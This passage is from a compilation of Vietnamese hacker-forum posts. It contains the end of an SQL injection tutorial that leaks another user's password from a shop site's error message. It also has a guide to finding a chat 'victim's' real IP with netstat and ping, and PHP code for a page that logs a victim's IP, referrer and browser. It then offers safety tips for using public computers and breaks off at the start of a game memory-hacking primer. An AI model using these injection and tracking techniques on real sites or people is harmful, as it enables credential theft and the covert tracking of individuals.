er_id%20not%20in%20('1')))/##sp_password

Kết quả

Microsoft OLE DB Provider for SQL Server (0x80040E07)

Syntax error converting the varchar value 'agilent1agilent1' to a column of data
type int.

shopViewProduct.asp, line 115

Như vậy User và Pass của người thứ hai là agilent1agilent1

Đến đây tôi xin kết thúc bài viết của mình. Phần còn lại các bạn có thể tự làm nốt
hoặc nghiên cứu gì đó cao siêu hơn.

Chúc các bạn Hack vui vẻ và đừng Drop DB của người ta nhé )


( Tác giả Neo )
( Admin vnISS+)

Hướng dẫn lấy IP của victim khi chát

Bài viết từ cd hacker mình share cùng các bạn
Rất mong sự góp ý của các bạn
Bạn phải chat với Victim dể có sự thiết lập IP. Nói chung là giữ Online Connect
với Victim.
Mở một cửa sổ DOS prompt
Vào C:gõ lệnh sau: netstat -a
C:\b netstat -a

Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau:
Active Connections

Proto Local Address Foreign Address State
TCP franck-a:0 0.0.0.0:0 LiSTENiNG
TCP franck-a:1091 0.0.0.0:0 LiSTENiNG
TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT
TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED

Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho
sự nối kết dã duợc thiết lập với bên ngoài.
Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có
nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là
Victim của mình.

Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng
chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác di nhung ta chỉ cần
quan tâm dến dòng tuong tự nhu vậy và có ESTABLiSHED là duợc

Việc tiếp theo của chúng ta là Ping Victim này dể lấy duợc IP thật của họ.
Cung ở của sổ DOS prompt này, ta gõ lệnh Ping p3-max35.auck.ihug.co.nz
:1054 ESTABLiSHED ==è chúng ta không quan tâm cái này nên không cần thêm
vào sau lệnh Ping

c:p3-max35.auck.ihug.co.nz
Wow, thật là tuyệt, tới dây ta dã thấy duợc IP thật của Victim rồi.

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39

Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.



Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trIP times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

209.76.151.67 chính là IP mà chúng ta cần tìm của Victim dây.

Chúc các bạn thành công
Cách này mình đã test thử và phát hiện rất tốt IP của victim
Bạn nhớ khi chát với victim nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác
hơn
trojon
Backdoor(VNISS)



sao lại phải 2 bước thế , dùng netstat-na có phải nhanh không. ka ka

không thì nhét cái trang này lên host, rồi gửi link cho victim là okiẹ
==================================

<html>
<head>
<title>Spy on yor site code by tapan21 of </title>

</head>
<table border="5" bg color="white">
<tr>
<td><center>
<body>
<?php

//
// Spy on your website! Logs in time, ip, the site you came from and browser!
// Created by: Tapan21 of
//

$spy = fopen("spy.html" , "a");
$site = $HTTP_REFERER;
$ip = $REMOTE_ADDR;
$browser = $HTTP_USER_AGENT;
$time = date("H:i dS F");

echo "The site you came from: " . $_SERVER["HTTP_REFERER"] . "<br />";
echo "ALL IP ADRESSES, TIME, SITE AND YOUR BROWSERS ARE BEING
CAPTURED!";

fwrite($spy,"<<<<< BEGIN >>>>><br />");
fwrite($spy,"Site you came from: $site <br />");
fwrite($spy,"IP Address: $ip <br />");
fwrite($spy,"Browser: $browser <br />");
fwrite($spy,"Time: $time <br />");
fwrite($spy,"<<<<< END >>>>><br />");

fclose($spy);

?>

</table>
</center></td>
</tr>
</table border>
</body>
</html>
==================================
microlife(VNISS)
6 nguyên tắc cơ bản khi sử dụng PC công cộng

bài viết sưu tầm


1. Sử dụng phần mềm chống Spyware
Tải phần mềm chống phần mềm gián điệp (spyware) như X-Cleaner của
Xblock.com. Phần mềm này có dung lượng rất nhỏ gọn, có thể sử dụng ngay trên
đĩa mềm hoặc trên USB mà không cần phải cài đặt. Hãy sử dụng các phần mềm
chống gián điệp để quét máy tính công cộng trước khi sử dụng. Đó là một ý kiến
hay


2. Không lưu lại những thông tin đăng nhập
Thay vì đóng cửa sổ trình duyệt hay gõ vào địa chỉ trang Web khác, bạn hãy thoát
khỏi (logout) trang Web bằng nhấn vào nút hoặc liên kết logout trên trang Web.
Điều này hạn chế khả năng người sử dụng khác có thể truy cập vào các thông tin
trong trang Web mà bạn vừa ghé thăm.
Rất nhiều chương trình, đặc biệt là các trình nhắn tin như Yahoo Messenger, MSN,
AOL đều có tính năng tự động đăng nhập (login) để lưu lại tên người sử dụng và

mật khẩu, giúp người sử dụng không phải gõ lại tên người dùng và mật khẩu. Tính
năng này chỉ hữu ích khi sử dụng trên máy tính của riêng bạn, chúng sẽ rất nguy
hiểm khi sử dụng ở những máy tính công cộng. Hãy vô hiệu chức năng này mỗi
khi sử dụng máy tính công cộng.


3. Bảo vệ mật khẩu
Các trình duyệt cũng có khả năng ghi nhớ mật khẩu. Trước khi lướt Web, nếu đang
sử dụng Internet Explorer, hãy chọn Tools -> Internet Options, trong thẻ Content,
vào AutoComplete và bỏ chọn toàn bộ các mục đánh dấu.
Sau khi đã hoàn thành, hãy chọn Tools->Internet Options. Tới thẻ Content, nhấn
vào AutoComplete, và chọn Clear Forms và Clear Passwords để xoá toàn bộ mật
khẩu và các dữ liệu.


4. Không hiển thị những thông tin nhạy cảm trên màn hình
Đừng để máy tính hiển thị những thông tin quan trọng, nhạy cảm như: thông tin cá
nhân, mã số tài khoản ngân hàng, mã số thẻ tín dụng Khi có việc cần phải đi ra
ngoài một chút, bạn hãy đóng toàn bộ các cửa sổ chương trình, thoát khỏi các cửa
sổ có chứa những thông tin nhạy cảm


5. Xoá mọi dấu vết
Sau khi sử dụng máy tính công cộng, hãy xoá bỏ mọi tập tin đệm và danh sách
History của Internet Explorer.
Để xoá các tập tin tạm và History trong IE bạn hãy thực hiện như sau:
Trong Internet Explorer, chọn Tools -> Internet Options
Trong thẻ General, chọn Temporary Internet files -> Delete Files, nhấn vào Delete
Cookies.
Dưới mục History, chọn Clear History.



6. Đừng nhập những dữ liệu "nhạy cảm" vào máy tính công cộng
Những phương pháp trên có thể cung cấp cho bạn một phương thức chống lại
những hành vi quen thuộc của hacker sẽ dùng lại những chiếc máy tính công cộng
này sau khi bạn sử dụng. Tuy nhiên, hacker hay những tên ăn trộm chuyên nghiệp
có thể sử dụng các phần mềm keylogger để ăn cắp thông tin, email Những công
cụ mà chúng sử dụng sẽ vô hiệu hoá, và lấy cắp được thông tin của bạn dễ dàng
ngay khi bạn đã xoá mọi dữ liệu liên quan.
Vì vậy, để thực sự an toàn, hãy tránh gõ vào số thẻ tín dụng, bất cứ những thông
tin tài chính hoặc các thông tin nhạy cảm vào trong máy tính công cộng. Đó là
cách sử dụng an toàn nhất cho bạn.

backdoor(VNISS)
CĂN BẢN VỀ GAME HACKING
[Khổng Hoàng Trung Tín]
HACK GAME KHÔNG PHẢI LÀ BẺ KHÓA phần mềm mà chỉ là dò tìm các giá
trị tài nguyên (gỗ, vàng, sắt ) của game được lưu trong bộ nhớ và sửa thành các
giá trị như ý muốn. Nói nôm na thì đó là chơi ăn gian ý mà. Khi bạn sử dụng